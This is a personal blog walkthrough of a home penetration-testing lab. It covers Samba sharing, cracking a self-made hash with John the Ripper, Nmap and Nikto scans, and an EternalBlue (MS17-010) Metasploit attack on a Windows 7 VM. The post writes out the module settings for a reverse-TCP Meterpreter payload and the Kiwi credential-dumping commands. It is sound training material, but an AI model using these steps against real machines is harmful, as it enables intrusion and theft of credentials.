zy0ud

Back

SMB Exploitation with EternalBlueSMB Exploitation with EternalBlue

Overview#

Second post in this lab series. Same private environment as Part 1 — Kali Linux and Windows Server 2022 on VMware Workstation. This time: setting up file sharing with Samba, cracking a password hash with John the Ripper, running vulnerability scans, and — since the patched Windows Server 2022 target wasn't exploitable — standing up a Windows 7 VM specifically to demonstrate EternalBlue (MS17-010) SMB exploitation and post-exploitation credential access with Metasploit and Kiwi.


Part 1: Samba File Sharing Between Kali and Windows Server#

Goal: set up a Samba share on Kali at /srv/samba/share and confirm read/write access from both Kali and Windows Server 2022.

Environment Setup#

Verified connectivity between hosts before starting.

Ping test from Kali Connectivity confirmed from Kali

Ping test from Windows Connectivity confirmed from Windows (PowerShell)

Installing and Configuring Samba on Kali#

sudo mkdir /srv/samba/share
sudo chmod 777 /srv/samba/share
sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
sudo systemctl restart smbd
sudo systemctl status smbd
bash

Samba install and config on Kali smbd active and running, share directory created

Mapping the Shared Folder on Windows Server#

Mapped the Kali Samba share as a network drive on Windows Server (\\192.168.1.100\).

Mapped shared folder on Windows Shared folder mapped as a network drive — empty at this point

Testing File Access and Sharing#

From Kali — created a test file directly in the share:

echo "Test file from Kali Linux" > /srv/samba/share/testfile.txt
bash

Writing a test file from Kali File written from the Kali side

Windows explorer showing the file Same file visible from Windows Explorer

From Windows — created a file from the Windows side to confirm the reverse direction:

Windows explorer with files from both sides Files from both Kali and Windows now present in the share

ls /srv/samba/share
bash

Kali confirming both files via ls Two-way read/write access confirmed


Part 2: Password Cracking with John the Ripper#

To practice offline password cracking, I generated a hashed password and cracked it with John the Ripper against the rockyou wordlist:

echo "hacker:$(openssl passwd -1 hacker123)" > passwd.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt
john --show passwd.txt
bash

John the Ripper cracking the hash Hash cracked in under a second — hacker:hacker123


Network and Vulnerability Scanning#

Advanced Nmap scan against the Windows Server 2022 target:

nmap -p- -sV --script vuln 192.168.1.39
bash

Came back clean — no exploitable vulnerabilities flagged (expected, since this target was already patched).

Nmap advanced vulnerability scan No exploitable vulnerabilities found on the patched target

Nikto web vulnerability scan:

nikto -h 192.168.1.39
bash

Nikto's findings were informational/reconnaissance-level — an admin login page (/login.html), and an ADFS (Active Directory Federation Services) sign-in page — useful leads for further enumeration and credential testing, but nothing directly exploitable on its own.

Nikto scan results Admin panel and ADFS sign-in page flagged


Exploiting SMB Vulnerabilities with Metasploit (EternalBlue)#

Since the patched Windows Server 2022 wasn't vulnerable to classic SMB exploits, I downloaded a Windows 7 SP1 VM specifically to demonstrate the technique — a well-known target for EternalBlue (MS17-010) in training environments.

Windows 7 ISO source Windows 7 Ultimate SP1 VM used as the vulnerable target

Configured the Samba share on the Windows 7 VM as well:

Samba share configured on Windows 7 Shared folder accessible from the Windows 7 target

Then set up the exploit in msfconsole:

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.1.48
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.100
options
plaintext

msfconsole EternalBlue module setup EternalBlue (MS17-010) module configured against the Windows 7 target

Running it returned a Meterpreter session, followed by a full shell — confirmed with sysinfo (Windows 7 6.1 Build 7601, SP1, x64):

Meterpreter session and shell obtained Meterpreter session opened, sysinfo and shell both working


Post-Exploitation: Credential Access with Kiwi (Mimikatz)#

With a session established, the next step was credential access. The classic approach is to load Mimikatz inside Meterpreter — but Meterpreter now flags Mimikatz as deprecated in favor of its replacement, Kiwi, and loads it automatically:

meterpreter > load mimikatz
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi ...
Success.
plaintext

Reference used for the Kiwi workflow: Kali - Use Kiwi to Extract Plaintext Passwords in Meterpreter (LabEx) ↗

load kiwi output Kiwi extension loaded automatically in place of Mimikatz

To pull credentials from the compromised host:

creds_all
plaintext

creds_all output showing NTLM hashes NTLM hash retrieved for the local account, running as SYSTEM


Conclusion#

This lab covered a good spread of practical skills: setting up cross-platform file sharing with Samba, offline password cracking with John the Ripper, vulnerability scanning with Nmap and Nikto, and — after confirming the patched Server 2022 box wasn't exploitable — standing up a deliberately vulnerable Windows 7 target to walk through the classic EternalBlue (MS17-010) SMB exploit end-to-end with Metasploit, from initial shell to credential harvesting with Kiwi.

Up next: brute-forcing SMB/RDP/WinRM and setting up persistence on the target.

EternalBlue: SMB Exploitation & Kiwi
https://zy0ud.me/blog/home-ad-lab-part2-samba-john-metasploit-kiwi
Author Ra'ad Alzyoud
Published at January 3, 2026